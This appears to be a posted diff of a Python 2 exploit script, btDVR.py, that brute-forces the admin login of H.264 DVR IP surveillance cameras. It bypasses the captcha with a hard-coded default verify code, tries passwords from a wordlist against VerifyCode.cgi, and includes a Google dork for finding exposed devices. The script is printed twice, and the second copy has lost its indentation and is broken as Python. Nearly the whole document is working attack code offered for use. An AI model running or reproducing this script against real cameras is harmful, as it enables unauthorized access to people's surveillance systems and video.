Acey9 · July 20, 2016 09:30
diff --git a/btDVR.py b/btDVR.py
 # Exploit Title: BruteForce IP CAMERA H.264 DVR 
 # Google Dork: intext:Any time & Any where IP Surveillance for Your Life
 # Date: 10/2/15
 # Exploit Author: RedToor
 # Software Link: https://sourceforge.net/projects/exploitsredtoor/files/btDVR.py
 # Version: ALL
 # Tested on: Windows and Linux
 # 
 # Poc
 # the Script bypass the captchat using a verify code default
 # so, we can testing password and usernames bypassing the captcha
 #
 # Use python btDVR.py -h 127.0.0.1 -p 3000 -l passwords.txt
 # user default: admin.

 import socket
 import base64
 import getopt
 import sys

 us="admin"

 options, remainder = getopt.getopt(sys.argv[1:], 'h:p:l:')
 for option, arg in options:
 		if option   == '-h':
 			ip=arg
 		elif option == '-p':
 			port=arg
 		elif option == '-l':
 			word=arg
 count=0
 with open(word, 'r') as claves:
 	for ps in claves:
 		count=count+1
 		ps=ps.replace("\n","")
 		print "\t["+str(count)+"] Testing with "+ps
 		path="cgi-bin/nobody/VerifyCode.cgi?account="+base64.b64encode(us+":"+ps)+"&captcha_code=6844&verify_code=685S.p/17Zkkc HTTP/1.1"
 		red=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 		red.connect((ip, int(port)))                                   
 		red.send("GET /"+path+"\r\n")							
 		red.send("HOST: "+ip+"\r\n\r\n")	
 		last=red.recv(1000)	
 		if last.find("ERROR")<=0:
 			print "\n Cracked with ID:"+us+" and PASS:"+ps+"\n"
 		else:
 			print "----------->Fail..."
 			red.close
	# Exploit Title: BruteForce IP CAMERA H.264 DVR
	# Google Dork: intext:Any time & Any where IP Surveillance for Your Life
	# Date: 10/2/15
	# Exploit Author: RedToor
	# Software Link: https://sourceforge.net/projects/exploitsredtoor/files/btDVR.py
	# Version: ALL
	# Tested on: Windows and Linux
	#
	# Poc
	# the Script bypass the captchat using a verify code default
	# so, we can testing password and usernames bypassing the captcha
	#
	# Use python btDVR.py -h 127.0.0.1 -p 3000 -l passwords.txt
	# user default: admin.

	import socket
	import base64
	import getopt
	import sys

	us="admin"

	options, remainder = getopt.getopt(sys.argv[1:], 'h:p:l:')
	for option, arg in options:
	if option == '-h':
	ip=arg
	elif option == '-p':
	port=arg
	elif option == '-l':
	word=arg
	count=0
	with open(word, 'r') as claves:
	for ps in claves:
	count=count+1
	ps=ps.replace("\n","")
	print "\t["+str(count)+"] Testing with "+ps
	path="cgi-bin/nobody/VerifyCode.cgi?account="+base64.b64encode(us+":"+ps)+"&captcha_code=6844&verify_code=685S.p/17Zkkc HTTP/1.1"
	red=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	red.connect((ip, int(port)))
	red.send("GET /"+path+"\r\n")
	red.send("HOST: "+ip+"\r\n\r\n")
	last=red.recv(1000)
	if last.find("ERROR")<=0:
	print "\n Cracked with ID:"+us+" and PASS:"+ps+"\n"
	else:
	print "----------->Fail..."
	red.close
No results found